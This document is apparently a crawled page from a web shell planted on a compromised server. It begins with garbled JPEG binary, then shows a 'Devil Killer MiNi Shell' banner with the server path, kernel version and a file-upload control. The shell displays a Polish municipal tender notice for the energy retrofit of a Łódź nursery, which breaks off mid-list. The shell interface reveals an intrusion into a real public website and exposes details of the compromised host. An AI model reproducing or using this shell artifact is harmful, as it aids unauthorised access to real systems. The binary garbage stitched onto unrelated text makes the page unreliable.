JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250520/0023891801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Termomodernizacja budynku publicznego w modelu EPC w Łodzi. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi zamawiający centralny</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Urząd Miasta Łodzi</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 472057632</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Piotrkowska 104</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">90-926</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@uml.lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://uml.lodz.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Termomodernizacja budynku publicznego w modelu EPC w Łodzi. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5cd7971c-3c28-4152-830f-598e661c474e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00238918</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00000657/15/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.143 Termomodernizacja budynków publicznych w modelu EPC w Łodzi</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 3 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://uml.ezamawiajacy.pl/pn/ML/demand/210939/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">[Numeracja zgodna z OPiW] 16.1	Środki komunikacji elektronicznej, przy użyciu, których Zamawiający będzie komunikował się z Wykonawcami oraz wymagania techniczne dla dokumentów elektronicznych oraz środków komunikacji elektronicznej.<br/>16.1.1	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się za pośrednictwem Platformy, która jest dostępna pod adresem https://uml.ezamawiajacy.pl<br/>16.1.2	Korzystanie z Platformy jest bezpłatne.<br/>16.1.3	W postępowaniu przekazywanie oświadczeń, wniosków, zawiadomień oraz informacji między Zamawiającym a Wykonawcami odbywa się za pośrednictwem Platformy znajdującej się pod adresem: https://uml.ezamawiajacy.pl poprzez kafelek „Wiadomości” kierujący do modułu korespondencji.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">[Numeracja zgodna z OPiW] 16.1.4	Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich wpływu na Platformę.<br/>16.1.11	Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>16.1.11.1	Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>16.1.11.2	Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej przeglądarki internetowej;<br/>16.1.11.3	Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS 1.2;<br/>16.1.11.4	Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>16.1.12	Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików <br/>o wielkości do 2 GB (pojedynczy plik): txt,rtf,pdf,xps,odt,ods,odp,doc,xls,ppt,docx,xlsx,pptx,csv,jpg,jpeg,tif,tiff,geotiff,png,svg,wav,mp3,avi,mpg,mpeg,mp4,m4a,mpeg4,ogg,ogv,zip,tar,gz,gzip,7z,html,xhtml,css,xml,xsd,gml,rng,xsl,xslt,tsl,xmlsig,xades,pades,cades,asic,asics,sig,xmlenc,dxf,ath,prd</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">36.1	Zgodnie z art. 13 ust. 1 i 2 ogólnego rozporządzenia o ochronie danych osobowych<br/>z dnia 27 kwietnia 2016 r. (rozporządzenie Parlamentu Europejskiego i Rady UE 2016/679 w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE) Zamawiający informuje, że:	<br/>36.1.1	Administratorem danych osobowych jest Prezydent Miasta Łodzi z siedzibą <br/>w Łodzi przy ul. Piotrkowskiej 104, 90-926 Łódź, tel.: +48 (42) 638-44-44, fax: +48 (42) 272-60-01, e-mail: lckm@uml.lodz.pl <br/>36.1.2	Administrator wyznaczył inspektora oraz zastępcę inspektora ochrony danych osobowych, z którymi może się Pani/Pan skontaktować poprzez e-mail iod@uml.lodz.pl Z inspektorem ochrony danych i jego zastępcą można się kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych przez Urząd Miasta Łodzi oraz korzystania z praw związanych<br/>z przetwarzaniem danych.<br/>36.1.3	Podanie danych osobowych jest warunkiem koniecznym do realizacji sprawy<br/>w Urzędzie Miasta Łodzi.<br/>36.1.4	Ogólną podstawę do przetwarzania danych stanowi art. 6 ust. 1 lit. b i c oraz art. 10 ogólnego rozporządzenia.<br/>36.1.5	Szczegółowe cele przetwarzania danych zostały wskazane w następujących przepisach:<br/>36.1.5.1	ustawie Pzp;<br/>36.1.5.2	ustawie z dnia 23 kwietnia 1964 r. – Kodeks cywilny;<br/>36.1.5.3	ustawie z dnia 27 sierpnia 2009 r. o finansach publicznych;<br/>36.1.5.4	ustawie z dnia 29 września 1994 r. o rachunkowości.<br/>36.1.6	Pani/Pana dane będą przetwarzane w celu:<br/>36.1.6.1	przeprowadzenia postępowania o udzielenie zamówienia publicznego<br/>i wyłonienie Wykonawcy;<br/>36.1.6.2 zawarcia umowy;<br/>36.1.6.3 rozliczenia finansowo- księgowego.<br/>36.1.7	Dane osobowe mogą być udostępniane innym podmiotom, uprawnionym do ich otrzymania na podstawie obowiązujących przepisów prawa, tj. na podstawie art. 18 i art. 74 ustawy Pzp a ponadto odbiorcom danych w rozumieniu przepisów <br/>o ochronie danych osobowych, tj. podmiotom świadczącym usługi pocztowe, kurierskie, usługi informatyczne, bankowe, ubezpieczeniowe, osobom i podmiotom zainteresowanym prowadzonym postępowaniem o udzielenie zamówienia publicznego, a także podmiotom korzystającym z Biuletynu Informacji Publicznej, Biuletynu Zamówień Publicznych, Bazy konkurencyjności oraz internetowej platformy zakupowej – eKatalogi, będącej w gestii Urzędu Zamówień Publicznych. Dane osobowe nie będą przekazywane do państw trzecich, na podstawie szczególnych regulacji prawnych, w tym umów międzynarodowych.<br/>36.1.8	Dane osobowe będą przetwarzane, w tym przechowywane przez okres 4 lat, licząc od pierwszego stycznia roku następującego po roku, w którym sprawa została zakończona, a następnie, zgodnie z przepisami ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach, przez okres 5 lat, zgodnie kategorią B5, w przypadku dokumentacji postępowania oraz 10 lat w związku <br/>z zawartą umową, zgodnie z kategorią archiwalną B10, a w przypadku zmiany kategorii archiwalnej dokumentacji przez okres zgodny ze zmienioną kategorią archiwalną dokumentacji. W przypadku zamówień finansowanych ze środków funduszy europejskich lub innych środków niż pochodzące z budżetu Unii Europejskiej na podstawie odrębnych przepisów tym zakresie do 25 lat.<br/>Ciąg dalszy w pkt 35.1.9-35.1.12 i 35.2 OPiW</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DOM-WZP-II.271.52.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.3.) Opis potrzeb Zamawiającego</h3><span class="normal">[Numeracja zgodna z OPiW] 5.1 Przedmiotem zamówienia jest przeprowadzenie kompleksowej modernizacji energetycznej obiektu użyteczności publicznej - Żłobka nr 10, znajdującego się w Łodzi przy ul. Karolewskiej 70/76, 94-023 Łódź (dalej również „Obiekt”) na podstawie umowy o poprawę efektywności energetycznej, będące jednocześnie przedsięwzięciem w rozumieniu art. 2 pkt 4) ustawy o PPP (dalej również: „Projekt”).<br/>5.2	Założeniem Zamawiającego jest wykonanie kompleksowej modernizacji energetycznej obiektu, w celu uzyskania następujących korzyści:<br/>5.2.1	osiągnięcia efektu energetycznego polegającego na obniżeniu poziomu zużycia energii elektrycznej i cieplnej, a w konsekwencji zmniejszenia bieżących kosztów utrzymania Obiektu;<br/>5.2.2	sfinansowania prac projektowych i robót budowlanych z wygenerowanych oszczędności finansowych spowodowanych zmniejszeniem zużycia energii w Obiekcie oraz ze środków pozyskanych przez Zamawiającego w ramach dofinansowania zewnętrznego;<br/>5.2.3	braku wpływu zobowiązań z tytułu realizacji zamówienia na państwowy dług publiczny oraz indywidulany wskaźnik zadłużenia;<br/>5.2.4	podniesienia standardu użytkowania Obiektu oraz jego estetyki.<br/>5.3	Zamawiający zakłada kompleksową realizację zamówienia przez wybranego Wykonawcę, którego zadaniem będzie:<br/>5.3.1	zapewnienie i poniesienie w całości nakładów finansowych na potrzeby realizacji Projektu;<br/>5.3.2	wykonanie niezbędnej dokumentacji projektowej w celu uzyskania decyzji i pozwoleń właściwych organów na przeprowadzenie niezbędnych prac oraz przeprowadzenie remontu/przebudowy Obiektu w określonym przez Zamawiającego zakresie (program funkcjonalno-użytkowy oraz audyt energetyczny), za wynagrodzeniem w postaci opłaty za dostępność;<br/>5.3.3	utrzymanie zmodernizowanej infrastruktury w okresie obowiązywania umowy oraz zarządzanie gospodarką energetyczną Obiektu poprzez wdrożenie zintegrowanego systemu sterowania w celu uzyskania zagwarantowanych w ofercie oszczędności w zużyciu energii elektrycznej i cieplnej;<br/>5.3.4	poniesienie większości ryzyk związanych z realizacją Projektu oraz uzależnienie wysokości wynagrodzenia od gwarancji dostępności przedmiotu partnerstwa oraz efektu energetycznego.<br/>5.4	Zakres rzeczowy Projektu obejmuje wskazane poniżej prace w Żłobku nr 10 <br/>ul. Karolewska 70/76, 94-023 Łódź:<br/>5.4.1	Ocieplenie ścian zewnętrznych (kondygnacji nadziemnych);<br/>5.4.2	Ocieplenie / izolacja fundamentów (ścian piwnicznych);<br/>5.4.3	Ocieplenie stropodachu nad I piętrem;<br/>5.4.4	Ocieplenie stropodachu nad parterem;<br/>5.4.5	Wymiana stolarki okiennej piwnicznej;<br/>5.4.6	Wymiana stolarki okiennej PCV;<br/>5.4.7	Wymiana stolarki drzwiowej;<br/>5.4.8	Modernizacja instalacji c.o.;<br/>5.4.9	Modernizacja instalacji c.w.u. i z.w.;<br/>5.4.10	System Zarządzania Energią;<br/>5.4.11	Wymiana punktów świetlnych na energooszczędne;<br/>5.4.12	Wymiana instalacji elektrycznej;<br/>5.4.13	Montaż paneli fotowoltaicznych;<br/>5.4.14	Roboty towarzyszące przy pracach termomodernizacyjnych: wymiana instalacji kanalizacji sanitarnej.<br/>5.5	Zamawiający będzie zobowiązany do udostępnienia Obiektu na potrzeby realizacji Projektu oraz do zapłaty Wykonawcy należnego mu wynagrodzenia, którego ostateczna wysokość będzie uzależniona od uzyskanych oszczędności w zużyciu energii oraz sposobu świadczenia usług utrzymania Obiektu.<br/>5.6	Szczegółowy zakres prac został wskazany w Programie Funkcjonalno-Użytkowym stanowiącym Załącznik nr 1 do OPiW.<br/>5.7	Założeniem Zamawiającego jest kompleksowa realizacja Projektu obejmująca pozyskanie finasowania, opracowanie dokumentacji projektowej, przeprowadzenie robót i świadczenie usług zarządzania i utrzymania – w ramach jednej umowy. Z uwagi na powyższe zamówienie nie zostało podzielone na części.<br/>5.8	Zamawiający zastrzega, iż szczegółowy zakres prac w Obiekcie, rozwiązania techniczne, okres trwania umowy, podział zadań i ryzyk zostaną określone w Specyfikacji Warunków Zamówienia na podstawie ustaleń poczynionych w toku negocjacji na podstawie analizy i wyboru przez Zamawiającego rozwiązań proponowanych przez Wykonawców.<br/>5.9	Minimalne wymagania, które nie będą podlegać zmianom w toku negocjacji, wskazane zostały w pkt 5.1 -5.3 OPiW<br/>5.10 Zamawiający informuje, że została podpisana umowa o dofinansowanie inwestycji ze środków Narodowego Funduszu Ochrony Środowiska i Gospodarki Wodnej zgromadzonych na rachunku Funduszu Modernizacyjnego w ramach inwestycji, o których mowa w pkt 7.5 ppkt 1 programu priorytetowego „Renowacja z gwarancją oszczędności EPC (Energy Performance Contract) Plus”.</span> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45210000-2 - Roboty budowlane w zakresie budynków</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">71314200-4 - Usługi zarządzania energią</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">144 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">1</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> aspekty środowiskowe, w tym efektywność energetyczna przedmiotu zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Poziom gwarantowanych oszczędności w zużyciu energii cieplnej i elektrycznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">2</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Podział zadań i ryzyk</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">3</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> [Numeracja zgodna z OPiW] 10.1.3	sytuacji ekonomicznej lub finansowej: <br/>Wykonawca spełni warunek w zakresie sytuacji ekonomicznej i finansowej, jeżeli wykaże że posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 3 000 000,00 PLN brutto.	<br/>Uwaga:<br/>Dla potrzeb oceny spełniania warunku określonego powyżej, jeśli wartość lub wartości zostaną podane w walutach innych niż PLN, Zamawiający, jako kurs przeliczeniowy waluty przyjmie średni kurs danej waluty publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, Narodowy Bank Polski nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, w którym zostanie on opublikowany.<br/>10.1.4	zdolności technicznej lub zawodowej: <br/>10.1.4.1	Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że wykonał należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończył nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie:<br/>- co najmniej jedno przedsięwzięcie termomodernizacyjne w rozumieniu art. 2 pkt 2) Ustawy o wspieraniu termomodernizacji obejmujące wykonanie robót budowlanych w co najmniej jednym budynku użyteczności publicznej <br/>(w ramach jednego zadania/umowy) o wartości robót budowlanych nie mniejszej niż 3.000.000,00 PLN brutto.<br/>oraz<br/>10.1.4.2 Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że wykonał lub wykonuje należycie nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie:	<br/>- co najmniej jedną usługę, która polega/ła na Zarządzaniu Energią w budynku użyteczności publicznej przez okres co najmniej 12 miesięcy, obejmującą co najmniej jeden pełny Sezon Grzewczy w ramach jednej umowy.<br/>Uwaga:<br/>1.	W przypadku usługi nadal wykonywanej (10.1.4.2) należy podać zakres i okres usługi zrealizowanej przed upływem terminu składania ofert.<br/>2.	Dopuszcza się, aby Wykonawca wskazał to samo zamówienie w celu potwierdzenia spełnienia warunku udziału w postępowaniu określonego w pkt 10.1.4.1 i 10.1.4.2 OPiW, jeżeli zamówienie to obejmowało zarówno usługę jak i robotę budowalną.<br/>3.	Dla potrzeb oceny spełniania warunku określonego powyżej, jeśli wartość lub wartości zostaną podane w walutach innych niż PLN, Zamawiający, jako kurs przeliczeniowy waluty przyjmie średni kurs danej waluty publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych Narodowy Bank Polski nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, w którym zostanie on opublikowany.<br/>4.	W przypadku gdy Wykonawca wykonywał w ramach kontraktu/umowy większy zakres prac, dla potrzeb zamówienia powinien wyodrębnić i podać zakres każdego zamówienia, o którym mowa powyżej.<br/>5.	Jeżeli Wykonawca wykazuje doświadczenie nabyte w ramach kontraktu/umowy realizowanego przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), Zamawiający nie dopuszcza by Wykonawca polegał na doświadczeniu grupy Wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie wykonywał wykazywanego zakresu prac. Zamawiający zastrzega możliwość zwrócenia się do Wykonawcy o wyjaśnienia w zakresie faktycznie i konkretnie wykonywanego zakresu prac oraz przedstawienia stosownych dowodów np. umowy konsorcjum, z której wynika zakres obowiązków czy wystawionych przez Wykonawcę faktur.<br/>6.	Jeżeli 